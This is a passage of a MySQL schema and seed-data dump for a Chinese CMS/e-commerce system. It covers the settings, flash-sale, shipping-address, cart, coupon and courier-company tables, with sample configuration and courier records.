`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `inc_type` (`inc_type`,`lang`)
) ENGINE=MyISAM AUTO_INCREMENT=47 DEFAULT CHARSET=utf8 COMMENT='系统非全局配置表';
-- -----------------------------
-- Records of `ey_setting`
-- -----------------------------
INSERT INTO `ey_setting` VALUES ('1', 'adminlogin_427d1aac31a93d744edd637f1fbbf00c', '0', 'adminlogin', 'cn', '1668569107');
INSERT INTO `ey_setting` VALUES ('2', 'adminlogin_a62896d354440964bb1db242596917b1', '0', 'adminlogin', 'cn', '1668569107');
INSERT INTO `ey_setting` VALUES ('3', 'adminlogin_99ae1cc546e0ed202a83693c75f1afe0', '0', 'adminlogin', 'cn', '1668569107');
INSERT INTO `ey_setting` VALUES ('4', 'ask_ques_steps', '1、写问题标题,描述具体现象。杜绝 “求救,大佬,小白…” 等和问题无关的词汇。\r\n2、选择问题的分类,选择正确的内容分类,能更快的得到其他人的回复。\r\n3、遇到的问题比较急需解决,可以给问题悬赏一定的金额报酬,能让更多同行参与进来出谋策划,从中选择自己心仪的答案。\r\n4、写问题内容详细描述你碰到的困难,写清楚你尝试了什么方法,错误代码,软件的版本等,更容易得到答案。\r\n5、点击发布。', 'ask', 'cn', '1668569108');
INSERT INTO `ey_setting` VALUES ('5', 'admin_logic_1649299958', '1', 'syn', 'cn', '1668569108');
INSERT INTO `ey_setting` VALUES ('6', 'system_old_product_attr', '0', 'system', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('7', 'syn_admin_logic_1625725290', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('8', 'syn_admin_logic_1629252424', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('9', 'admin_logic_1634204189', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('10', 'admin_logic_1634280892', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('11', 'admin_logic_1635326854', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('12', 'admin_logic_1635389623', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('13', 'admin_logic_1636875693', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('14', 'admin_logic_1637033990', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('15', 'admin_logic_1640918327', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('16', 'admin_logic_1638857408', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('17', 'admin_logic_1643352860', '2', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('18', 'admin_logic_1643352862', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('19', 'admin_logic_1643352863', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('20', 'security_askanswer_list', '[\"\\u60a8\\u5e38\\u7528\\u7684\\u624b\\u673a\\u53f7\\u7801\\u662f\\uff1f\",\"\\u60a8\\u5e38\\u7528\\u7684\\u7535\\u5b50\\u90ae\\u7bb1\\u662f\\uff1f\",\"\\u60a8\\u771f\\u5b9e\\u7684\\u59d3\\u540d\\u662f\\uff1f\",\"\\u60a8\\u521d\\u4e2d\\u5b66\\u6821\\u540d\\u662f\\uff1f\",\"\\u60a8\\u7684\\u51fa\\u751f\\u5730\\u540d\\u662f\\uff1f\",\"\\u60a8\\u914d\\u5076\\u7684\\u59d3\\u540d\\u662f\\uff1f\",\"\\u60a8\\u7684\\u8eab\\u4efd\\u8bc1\\u53f7\\u540e\\u516b\\u4f4d\\u662f\\uff1f\",\"\\u60a8\\u9ad8\\u4e2d\\u73ed\\u4e3b\\u4efb\\u7684\\u540d\\u5b57\\u662f\\uff1f\",\"\\u60a8\\u521d\\u4e2d\\u73ed\\u4e3b\\u4efb\\u7684\\u540d\\u5b57\\u662f\\uff1f\",\"\\u60a8\\u6700\\u559c\\u6b22\\u7684\\u660e\\u661f\\u540d\\u5b57\\u662f\\uff1f\",\"\\u5bf9\\u60a8\\u5f71\\u54cd\\u6700\\u5927\\u7684\\u4eba\\u540d\\u5b57\\u662f\\uff1f\"]', 'security', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('21', 'admin_logic_1643352864', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('22', 'admin_logic_1647918733', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('23', 'system_originlist', '[\"\\u7f51\\u7edc\"]', 'system', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('24', 'admin_logic_1648435161', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('25', 'admin_logic_1648882158', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('26', 'admin_logic_1649399344', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('27', 'syn_admin_logic_1616123194', '1', 'syn', 'cn', '1668569109');
INSERT INTO `ey_setting` VALUES ('28', 'admin_logic_1655453263', '1', 'syn', 'cn', '1686213562');
INSERT INTO `ey_setting` VALUES ('29', 'admin_logic_1652254594', '1', 'syn', 'cn', '1686213562');
INSERT INTO `ey_setting` VALUES ('30', 'designated_column_1657069673', '1', 'syn', 'cn', '1686213562');
INSERT INTO `ey_setting` VALUES ('31', 'admin_logic_1652771782', '1', 'syn', 'cn', '1686213562');
INSERT INTO `ey_setting` VALUES ('32', 'admin_logic_1667210674', '1', 'syn', 'cn', '1686213562');
INSERT INTO `ey_setting` VALUES ('33', 'syn_admin_logic_1616123195', '1', 'syn', 'cn', '1686213562');
INSERT INTO `ey_setting` VALUES ('34', 'admin_logic_1651114275', '1', 'syn', 'cn', '1686213562');
INSERT INTO `ey_setting` VALUES ('35', 'admin_logic_1662518904', '1', 'syn', 'cn', '1686213563');
INSERT INTO `ey_setting` VALUES ('36', 'admin_logic_1667357946', '1', 'syn', 'cn', '1686213563');
INSERT INTO `ey_setting` VALUES ('37', 'admin_logic_1663290997', '1', 'syn', 'cn', '1686213563');
INSERT INTO `ey_setting` VALUES ('38', 'syn_admin_logic_1660557712', '1', 'syn', 'cn', '1686213563');
INSERT INTO `ey_setting` VALUES ('39', 'admin_logic_1673941712', '1', 'syn', 'cn', '1686213588');
INSERT INTO `ey_setting` VALUES ('40', 'admin_logic_1676854942', '1', 'syn', 'cn', '1686213588');
INSERT INTO `ey_setting` VALUES ('41', 'admin_logic_1675243579', '1', 'syn', 'cn', '1686213588');
INSERT INTO `ey_setting` VALUES ('42', 'admin_logic_1677555001', '1', 'syn', 'cn', '1686213588');
INSERT INTO `ey_setting` VALUES ('43', 'admin_logic_1678762367', '1', 'syn', 'cn', '1686213588');
INSERT INTO `ey_setting` VALUES ('44', 'admin_logic_1685584104', '1', 'syn', 'cn', '1686213588');
INSERT INTO `ey_setting` VALUES ('45', 'admin_logic_1682580429', '1', 'syn', 'cn', '1686213588');
INSERT INTO `ey_setting` VALUES ('46', 'admin_logic_1680749290', '1', 'syn', 'cn', '1686213588');
-- -----------------------------
-- Table structure for `ey_sharp_active`
-- -----------------------------
DROP TABLE IF EXISTS `ey_sharp_active`;
CREATE TABLE `ey_sharp_active` (
`active_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '活动会场ID',
`active_date` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '活动日期',
`status` tinyint(3) unsigned NOT NULL DEFAULT '1' COMMENT '活动状态(0禁用 1启用)',
`is_del` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT '是否删除',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`active_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='整点秒杀-活动会场表';
-- -----------------------------
-- Table structure for `ey_sharp_active_goods`
-- -----------------------------
DROP TABLE IF EXISTS `ey_sharp_active_goods`;
CREATE TABLE `ey_sharp_active_goods` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键ID',
`active_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '活动会场ID',
`active_time_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '活动场次ID',
`aid` int(11) NOT NULL DEFAULT '0' COMMENT '文档id',
`sharp_goods_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '秒杀商品ID',
`sales_actual` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '实际销量',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='整点秒杀-活动会场与商品关联表';
-- -----------------------------
-- Table structure for `ey_sharp_active_time`
-- -----------------------------
DROP TABLE IF EXISTS `ey_sharp_active_time`;
CREATE TABLE `ey_sharp_active_time` (
`active_time_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '场次ID',
`active_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '活动会场ID',
`active_time` tinyint(3) unsigned NOT NULL DEFAULT '1' COMMENT '场次时间(0点-23点)',
`status` tinyint(3) unsigned NOT NULL DEFAULT '1' COMMENT '活动状态(0禁用 1启用)',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`active_time_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='整点秒杀-活动会场场次表';
-- -----------------------------
-- Table structure for `ey_sharp_goods`
-- -----------------------------
DROP TABLE IF EXISTS `ey_sharp_goods`;
CREATE TABLE `ey_sharp_goods` (
`sharp_goods_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '秒杀商品ID',
`aid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '商品ID->aid',
`limit` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '限购数量',
`seckill_stock` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '秒杀商品库存总量',
`seckill_price` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '秒杀价格',
`sales` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '累积销量',
`virtual_sales` int(11) NOT NULL DEFAULT '0' COMMENT '虚拟销量',
`sort_order` int(11) unsigned NOT NULL DEFAULT '100' COMMENT '商品排序(数字越小越靠前)',
`status` tinyint(3) unsigned NOT NULL DEFAULT '1' COMMENT '商品状态(0下架 1上架)',
`is_del` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT '是否删除',
`is_sku` tinyint(1) NOT NULL DEFAULT '0' COMMENT '1-多规格商品',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`sharp_goods_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='整点秒杀-商品表';
-- -----------------------------
-- Table structure for `ey_sharp_setting`
-- -----------------------------
DROP TABLE IF EXISTS `ey_sharp_setting`;
CREATE TABLE `ey_sharp_setting` (
`key` varchar(30) NOT NULL DEFAULT '' COMMENT '设置项标示',
`describe` varchar(255) NOT NULL DEFAULT '' COMMENT '设置项描述',
`values` mediumtext NOT NULL COMMENT '设置内容(json格式)',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
UNIQUE KEY `unique_key` (`key`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='整点秒杀设置表';
-- -----------------------------
-- Table structure for `ey_shop_address`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_address`;
CREATE TABLE `ey_shop_address` (
`addr_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '地址id',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '会员id',
`consignee` varchar(60) NOT NULL DEFAULT '' COMMENT '收货人',
`country` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '国家',
`province` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '省份',
`city` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '城市',
`district` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '县区',
`address` varchar(500) NOT NULL DEFAULT '' COMMENT '详细地址',
`zipcode` varchar(10) NOT NULL DEFAULT '' COMMENT '邮政编码',
`mobile` varchar(20) NOT NULL DEFAULT '' COMMENT '手机',
`is_default` tinyint(1) DEFAULT '0' COMMENT '是否默认,0否,1是。',
`lang` varchar(30) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '添加时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`addr_id`),
KEY `users_id` (`users_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='收货地址表';
-- -----------------------------
-- Table structure for `ey_shop_cart`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_cart`;
CREATE TABLE `ey_shop_cart` (
`cart_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '购物车表',
`users_id` int(10) unsigned DEFAULT '0' COMMENT '会员id',
`product_id` int(10) unsigned DEFAULT '0' COMMENT '产品id',
`product_num` int(10) unsigned DEFAULT '0' COMMENT '购买数量',
`spec_value_id` varchar(100) DEFAULT '' COMMENT '规格值ID',
`selected` tinyint(1) DEFAULT '1' COMMENT '购物车选中状态:0未选中,1选中',
`lang` varchar(30) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '加入购物车的时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`discount_active_id` int(11) DEFAULT '0' COMMENT '限时折扣ID,用来区分购物车的商品哪些是限时折扣活动的',
PRIMARY KEY (`cart_id`),
KEY `users_id` (`users_id`,`product_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='购物车表';
-- -----------------------------
-- Table structure for `ey_shop_coupon`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_coupon`;
CREATE TABLE `ey_shop_coupon` (
`coupon_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`coupon_code` varchar(100) NOT NULL DEFAULT '' COMMENT '优惠券编号',
`coupon_name` varchar(100) NOT NULL DEFAULT '' COMMENT '优惠券名称',
`coupon_color` varchar(25) NOT NULL DEFAULT '' COMMENT '优惠券颜色',
`coupon_form` tinyint(1) NOT NULL DEFAULT '1' COMMENT '优惠券类型 1-满减券',
`coupon_type` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '可使用商品(1全站通用,2指定商品,3指定商品分类)',
`product_id` varchar(255) NOT NULL DEFAULT '' COMMENT '指定商品ID,在coupon_type=2时使用',
`arctype_id` varchar(255) NOT NULL DEFAULT '' COMMENT '指定商品分类ID,在coupon_type=3时使用',
`coupon_price` decimal(10,0) NOT NULL DEFAULT '0' COMMENT '优惠券金额,例如10',
`conditions_use` decimal(10,0) NOT NULL DEFAULT '0' COMMENT '优惠券使用条件,例如300',
`coupon_stock` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '优惠券库存,例如100',
`redeem_points` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '兑换优惠券所需积分,为0则表示免费兑换',
`redeem_authority` varchar(10) NOT NULL DEFAULT '' COMMENT '兑换权限,存入多个会员等级组ID',
`valid_days` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '有效天数,例如30',
`start_date` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '优惠券开放领取时间',
`end_date` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '优惠券结束领取时间',
`sort_order` int(11) unsigned NOT NULL DEFAULT '100' COMMENT '规格排序号',
`status` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '优惠券状态(0=关闭,1=开启)',
`use_type` int(1) NOT NULL DEFAULT '1' COMMENT '使用期限 \r\n1-固定日期\r\n 2-领取后当天开始N(valid_days)天内有效\r\n 2-领取后次日开始N(valid_days)天内有效',
`use_start_time` int(11) NOT NULL COMMENT '使用期限开始时间',
`use_end_time` int(11) NOT NULL COMMENT '使用期限结束时间',
`is_del` tinyint(1) DEFAULT '0' COMMENT '0-未删除 1-已删除',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`coupon_id`),
KEY `product_id` (`product_id`) USING BTREE,
KEY `arctype_id` (`arctype_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='优惠券主表';
-- -----------------------------
-- Table structure for `ey_shop_coupon_use`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_coupon_use`;
CREATE TABLE `ey_shop_coupon_use` (
`use_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`users_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '会员ID',
`coupon_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '优惠券ID',
`coupon_code` varchar(100) NOT NULL DEFAULT '' COMMENT '优惠券编号',
`get_ip` varchar(15) NOT NULL DEFAULT '' COMMENT '领取时的IP地址',
`get_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '优惠券领取时的时间',
`use_status` tinyint(4) unsigned NOT NULL DEFAULT '1' COMMENT '优惠券使用状态(0未使用,1已使用,2已过期,3已冻结)',
`use_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '优惠券使用时的时间',
`start_time` int(10) NOT NULL DEFAULT '0' COMMENT '优惠券有效开始时间',
`end_time` int(10) NOT NULL DEFAULT '0' COMMENT '优惠券有效结束时间',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`use_id`),
KEY `coupon_id` (`coupon_id`) USING BTREE,
KEY `coupon_code` (`coupon_code`) USING BTREE,
KEY `users_id` (`users_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='优惠券-领取记录表';
-- -----------------------------
-- Table structure for `ey_shop_express`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_express`;
CREATE TABLE `ey_shop_express` (
`express_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增id',
`express_code` varchar(32) NOT NULL DEFAULT '' COMMENT '物流code',
`express_name` varchar(32) NOT NULL DEFAULT '' COMMENT '物流名称',
`express_lnitials` varchar(5) NOT NULL DEFAULT '' COMMENT '首字母',
`is_choose` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '快递公司是否选中(0=否,1=是)',
`sort_order` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '排序号',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`express_id`)
) ENGINE=MyISAM AUTO_INCREMENT=599 DEFAULT CHARSET=utf8 COMMENT='快递公司表';
-- -----------------------------
-- Records of `ey_shop_express`
-- -----------------------------
INSERT INTO `ey_shop_express` VALUES ('1', 'yuantong', '圆通快递', 'Y', '1', '97', '1553911076', '1554974797');
INSERT INTO `ey_shop_express` VALUES ('2', 'shentong', '申通快递', 'S', '1', '98', '1553911076', '1554974707');
INSERT INTO `ey_shop_express` VALUES ('3', 'shunfeng', '顺丰快递', 'S', '1', '98', '1553911076', '1554974710');
INSERT INTO `ey_shop_express` VALUES ('4', 'yunda', '韵达快递', 'Y', '1', '99', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('5', 'debangwuliu', '德邦快递', 'D', '1', '99', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('6', 'zhongtong', '中通快递', 'Z', '1', '99', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('7', 'huitongkuaidi', '百世快递', 'B', '1', '99', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('8', 'youzhengguonei', '邮政包裹', 'Y', '1', '99', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('9', 'ems', 'EMS', 'E', '1', '99', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('10', 'youzhengguoji', '邮政国际', 'Y', '1', '99', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('11', 'aolau', 'AOL澳通速递', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('12', 'a2u', 'A2U速递', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('13', 'aae', 'AAE快递', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('14', 'annengwuliu', '安能物流', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('15', 'anxl', '安迅物流', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('16', 'auexpress', '澳邮中国快运', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('17', 'exfresh', '安鲜达', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('18', 'anjie88', '安捷物流', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('19', 'adodoxm', '澳多多国际速递', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('20', 'ariesfar', '艾瑞斯远', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('21', 'qdants', 'ANTS EXPRESS', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('22', 'astexpress', '安世通快递', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('23', 'gda', '安的快递', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('24', 'ausexpress', '澳世速递', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('25', 'ibuy8', '爱拜物流', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('26', 'aplusex', 'Aplus物流', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('27', 'adapost', '安达速递', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('28', 'adiexpress', '安达易国际速递', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('29', 'maxeedexpress', '澳洲迈速快递', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('30', 'onway', '昂威物流', 'A', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('31', 'bcwelt', 'BCWELT', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('32', 'balunzhi', '巴伦支快递', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('33', 'xiaohongmao', '北青小红帽', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('34', 'bfdf', '百福东方物流', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('35', 'bangsongwuliu', '邦送物流', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('36', 'lbbk', '宝凯物流', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('37', 'bqcwl', '百千诚物流', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('38', 'idada', '百成大达物流', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('39', 'baishiwuliu', '百世快运', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('40', 'baitengwuliu', '百腾物流', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('41', 'birdex', '笨鸟海淘', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('42', 'bsht', '百事亨通', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('43', 'benteng', '奔腾物流', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('44', 'cuckooexpess', '布谷鸟速递', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('45', 'bgky100', '邦工快运', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('46', 'bosind', '堡昕德速递', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('47', 'banma', '斑马物联网', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('48', 'polarisexpress', '北极星快运', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('49', 'beijingfengyue', '北京丰越供应链', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('50', 'europe8', '败欧洲', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('51', 'bmlchina', '标杆物流', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('52', 'comexpress', '邦通国际', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('53', 'baotongkd', '宝通快递', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('54', 'beckygo', '佰麒快递', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('55', 'boyol', '贝业物流', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('56', 'bdatong', '八达通快递', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('57', 'bangbangpost', '帮帮发', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('58', 'baoxianda', '报通快递', 'B', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('59', 'coe', '中国东方(COE)', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('60', 'cloudexpress', 'CE易欧通国际速递', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('61', 'city100', '城市100', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('62', 'chuanxiwuliu', '传喜物流', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('63', 'chengjisudi', '城际速递', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('64', 'lijisong', '立即送', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('65', 'chukou1', '出口易', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('66', 'nanjingshengbang', '晟邦物流', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('67', 'flyway', '程光快递', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('68', 'cbo56', '钏博物流', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('69', 'cex', '城铁速递', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('70', 'cnup', 'CNUP 中联邮', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('71', 'clsp', 'CL日中速运', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('72', 'cnair', 'CNAIR', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('73', 'cangspeed', '仓鼠快递', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('74', 'spring56', '春风物流', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('75', 'cunto', '村通快递', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('76', 'longvast', '长风物流', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('77', 'changjiang', '长江国际速递', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('78', 'cncexp', 'C&C国际速递', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('79', 'parcelchina', '诚一物流', 'C', '1', '100', '1553911076', '1553911076');
